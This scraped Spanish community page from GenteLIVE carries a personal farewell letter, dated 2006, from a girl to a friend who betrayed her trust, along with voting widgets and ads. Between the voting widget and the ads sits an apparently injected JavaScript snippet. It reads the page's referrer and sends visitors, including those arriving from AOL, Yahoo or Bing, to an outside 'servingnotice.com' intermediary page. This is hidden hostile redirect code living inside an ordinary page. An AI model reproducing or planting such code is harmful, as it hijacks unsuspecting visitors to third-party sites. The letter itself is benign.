Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;

Todos los cursos, masters y oposiones que existen.

Gasta bromas por teléfono a tus amigos y familiares.
Las mejores inocentadas para el 28 de diciembre
 

 
 
   

Carta

Despedida a un amigo
[15-12-2006 22:29]

Te miro y veo que has cambiado. Ya no eres la misma persona que yo conocí. A veces pienso que lo haces por molestarme, otras, simplemente, que realmente eres así.

Cuando te veo hacer con otras personas lo que hacías conmigo, los celos me comen por dentro. Pero se que soy fuerte. Podré con esto. Se que al final te olvidaré y, algún día, te darás cuenta de lo que has perdido, de lo que has dejado marchar, o puede que sea yo la que se de cuenta de que he perdido un gran amigo.

Jamás podré perdonarte, nunca nada volverá a ser como antes, aunque me des la razón, aunque me supliques que te perdone.

Ya te di muchas oportunidades y no volveré a darte otra.

¿Tienes miedo a la confianza? Yo creo que si, una vez me lo dijiste, pero no te creí, ahora veo que cuando alguien confía en ti y te apoya te enfadas y le das la puñalada trapera.

Solo quiero que sepas que me has hecho daño, aunque no te guardo ningún rencor. Siempre te recordaré por los buenos momentos. Aquella vez que me cambiaste el sitio para que no estuviese con alguien que no quería, o cuando me ayudaste en alguna asignatura, o te esperabas conmigo hasta que venían a buscarme. Tampoco olvidaré aquella tarde que casi me quedo dormida apoyada en tu pierna mientras me acariciabas en la mejilla, ni lo que nos reíamos por tonterías, ni la primera vez que salimos por ahí y nos perdimos.

Te miro, no te conozco, y pienso: así me será más fácil olvidar a aquel chico que una vez tanto quise.

Cuando me miras veo indiferencia, ¿de verdad ya te has olvidado de mi? Supongo que sí, solo he sido una chica más con la que has sido como tú siempre has dicho que eras y yo me negaba a ver, malo.

Lo que mas siento de todo, es que jamás, nunca, podrás leer esta carta. Si fueses aquel chico que yo conocía, si te la daría, pero al haber cambiado...seguro que me la tirarías a la cara, y mis sentimientos no están ahora para un choque así.

Quizá algún día recoja fuerzas y te la dé. Así podrás saber aquello que tantas veces me has preguntado: ¿qué piensas?.

Despido esta amistad casi entre lágrimas, una amistad que siempre perdurará en lo más profundo de mi corazón, junto a aquellas cosas que tanto quise una vez y que poco a poco voy almacenando, pero no olvidando.

De una amiga a un gran amigo. Un gran amigo que he perdido para siempre.


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda